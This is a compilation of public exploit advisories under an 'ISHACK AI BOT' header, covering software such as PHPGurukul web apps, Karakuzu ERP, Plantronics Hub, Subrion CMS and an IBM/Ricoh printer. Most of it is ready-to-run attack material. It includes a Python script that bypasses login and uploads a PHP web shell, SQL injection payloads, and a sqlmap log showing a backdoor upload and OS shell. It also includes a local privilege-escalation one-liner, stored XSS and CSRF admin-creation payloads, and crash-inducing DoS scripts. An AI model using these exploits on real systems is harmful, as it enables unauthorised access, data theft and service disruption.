ISHACK AI BOT

# Exploit Title: Online Course Registration 2.0 - Remote Code Execution # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-course-registration-free-download/ # Version: v2.0 # Category: Webapps # Tested on: Xampp for Windows # Description: Attacker can bypass login page and access to student change password dashboard. PoC Request (Authentication Bypass): POST /onlinecourse/index.php HTTP/1.1 Host: target regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit= There isn't any file extension control in student panel "My Profile" section. An unauthorized user can upload php file as profile image. First PoC Request (RCE): POST /onlinecourse/my-profile.php HTTP/1.1 Host: target -----------------------------16046344889164047791563222514 Content-Disposition: form-data; name="photo"; filename="simple.php" Content-Type: application/x-php <?php $cmd=$_GET["cmd"]; echo `$cmd`; ?> Second PoC Request (RCE): GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1 Host: target Below basic python script will bypass authentication and execute command on target server. import requests import sys if (len(sys.argv) !=3) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath " print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse " exit(0) rhost = sys.argv[1] command = sys.argv[2] url = "http://"+rhost+"/index.php" data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: #bypass authentication lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False) if check.status_code == 200: print "[+] Authentication bypass was successfull" else: print "[-] Authentication bypass was unsuccessful" sys.exit() #upload simple php file files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')} fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""} furl = "http://"+rhost+"/my-profile.php" session.post(url=furl, files= files, data=fdata) #execution final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command) #check execution if final.status_code == 200: print "[+] Command execution completed successfully." print "\tPut on a happy face!\n" else: print "[-] Command execution was unsuccessful." sys.exit() print final.text online-course-registration-rce.png poc.py import requests import sys if (len(sys.argv) !=3) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath " print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse " exit(0) rhost = sys.argv[1] command = sys.argv[2] url = "http://"+rhost+"/index.php" data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: #bypass authentication lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False) if check.status_code == 200: print "[+] Authentication bypass was successfull" else: print "[-] Authentication bypass was unsuccessful" sys.exit() #upload simple php file files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')} fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""} furl = "http://"+rhost+"/my-profile.php" session.post(url=furl, files= files, data=fdata) #execution final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command) #check execution if final.status_code == 200: print "[+] Command execution completed successfully.\n" print "\tPut on a happy face!\n" else: print "[-] Command execution was unsuccessful." sys.exit() print final.text

# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection # Discovery Date: 2019-09-20 # Exploit Author: Hakan TAŞKÖPRÜ # Vendor Homepage: http://karakuzu.info/ # Effected Version <= 5.7.0 Vulnerability #1: Unauthenticated SQL Injection ================================================== Type: Error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND 1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))-- DhDH&k_yetki_duz=USER&kullanici_duzenle= Type: Time-based blind Title: Oracle AND time-based blind Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND 6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)-- VuHD&k_yetki_duz=USER&kullanici_duzenle= POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle= Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and k_sifre_duz parameters are injectable/vulnerable. Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User Management Panel ======================================================================================= Description : An attacker can stole an admin’s cookie. POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)" autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit= Vulnerability #3: Unauthenticated Creating Admin User ====================================================== Description : An attacker can create an admin or normal account. Request: POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit= Vulnerability #4: Unauthenticated Deleting User ============================================= Description : An attacker can delete an admin or normal account. POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded kullanici_sil=k_adi_duz=USERNAME_TO_DELETE Vulnerability #5: Unauthenticated Editing User =============================================== Description : An attacker can change a user’s password or role(e.g ROOT). POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle= ### History ============= 2019-09-20 Issue discovered 2019-11-19 Vendor contacted (No response) 2020-01-03 Issue published

# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation # Date: 2020-01-2 # Exploit Author: Markus Krell - @MarkusKrell # Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf # Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe # Version: Plantronics Hub for Windows prior to version 3.14 # Tested on: Windows 10 Enterprise # CVE : N/A As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner: <WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD> Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. You may of course call any other binary you can plant on the machine. Steps for exploitation (PoC): - Open cmd.exe - Navigate using cd C:\ProgramData\Plantronics\Spokes3G - echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config

# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: Chris Inzinga # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows # CVE: N/A # The Dairy Farm Shop Management System 1.0 web application is vulnerable to # SQL injection in multiple areas. The most severe of these is the username # parameter on the login page as this injection can be done unauthenticated. ================================ 'username' - SQLi ================================ POST /dfsms/index.php HTTP/1.1 Host: 192.168.0.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.33/dfsms/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 34 Connection: close Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg Upgrade-Insecure-Requests: 1 username=test&password=test&login= --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'category' & 'categorycode' - SQLi ================================ POST /dfsms/add-category.php HTTP/1.1 Host: 192.168.0.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.33/dfsms/add-category.php Content-Type: application/x-www-form-urlencoded Content-Length: 39 Connection: close Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg Upgrade-Insecure-Requests: 1 category=test&categorycode=test&submit= --- Parameter: category (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 --- Parameter: categorycode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'companyname' - SQLi ================================ --- Parameter: companyname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'productname' & 'productprice' - SQLi ================================ --- Parameter: productname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit= --- --- Parameter: productprice (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit= --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ================================ 'fromdate' & 'todate' - SQLi ================================ --- Parameter: todate (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit= Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit= Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit= Parameter: fromdate (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit= --- ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================ --- Parameter: emailid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: adminname=Admin&username=admin&[email protected]' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update= --- --- Parameter: adminname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&[email protected]&mobilenumber=1234567899&update= --- --- Parameter: mobilenumber (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: adminname=Admin&username=admin&[email protected]&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update= ---

# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.0 # Tested on: Windows 7 # CVE : N/A Description: The Complaint Management System v4.0 application from PHPgurukul is vulnerable to blind SQL injection via the 'cid' parameter which is found on the complaint-details.php page. ========== 1. SQLi ========== SQLMAP POC: GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests: --- Parameter: cid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+' --- The ?cid parameter is vulnerable to sql injection within the the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2 request: GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot Upgrade-Insecure-Requests: 1

# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install NetShareWatcher 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.NetShareWatcher Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotFTP 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.SpotFTP Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting # Date: 2020-01-02 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ibm.com/il-en # Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN # Vulernability Type: Cross-site Scripting # Vulenrability: Stored XSS # CVE: N/A # Description : # Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the # cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.) HTTP Request : POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1 Host: 134.84.35.70 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 281 Origin: https://134.84.35.70 Connection: close Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html Upgrade-Insecure-Requests: 1 0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40= HTTP Response : HTTP/1.0 200 OK Content-Type: text/html Content-Length: 269

# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) # Date: 2020-01-05 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://intelliants.com/ # Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5 # Software : Subrion CMS # Product Version: v 4.0.5.10 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS. # With this vulnerability, authorized users can be added to the system. HTML CSRF PoC : <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270"); xhr.withCredentials = true; var body = "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"__st\"\r\n" + "\r\n" + "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "ismailtasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"fullname\"\r\n" + "\r\n" + "Ismail Tasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"email\"\r\n" + "\r\n" + "[email protected]\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password2\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"website\"\r\n" + "\r\n" + "https://ismailtasdelen.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"phone\"\r\n" + "\r\n" + "0000000000000000000\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"biography\"\r\n" + "\r\n" + "NULL\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"facebook\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"twitter\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"gplus\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"linkedin\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"plan_id\"\r\n" + "\r\n" + "2\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" + "\r\n" + "2020-02-05 05:18:43\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured_end\"\r\n" + "\r\n" + "2020-02-05 05:19\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"status\"\r\n" + "\r\n" + "active\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"save\"\r\n" + "\r\n" + "Add\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"goto\"\r\n" + "\r\n" + "list\r\n" + "-----------------------------9973334999367242361642875270--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>

# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install BlueAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.BlueAuditor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path #Exploit Author : ZwX #Exploit Date: 2020-01-05 #Vendor Homepage : http://webcompanion.com/ #Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2 #Tested on OS: Windows 10 #Analyze PoC : ============== C:\Users\ZwX>sc qc WCAssistantService [SC] QueryServiceConfig réussite(s) SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WC Assistant DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection # Google Dork: intitle: "Hostel management system" # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/hostel-management-system/ # Version: v2.0 # Tested on: Windows # CVE : N/A Description: The Hostel Management System v2.0 application from PHPgurukul is vulnerable to SQL injection via the 'id' parameter on the full-profile.php page. ==================== 1. SQLi ==================== http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1 THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system GET parameter 'id' is vulnerable. --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-3444' OR 1650=1650# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1' OR SLEEP(5)-- slKU Type: UNION query Title: MySQL UNION query (NULL) - 29 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# [14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php [14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php [14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'john-pc\john' os-shell>

# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install BlueAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.BlueAuditor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Dnss 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.Dnss Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

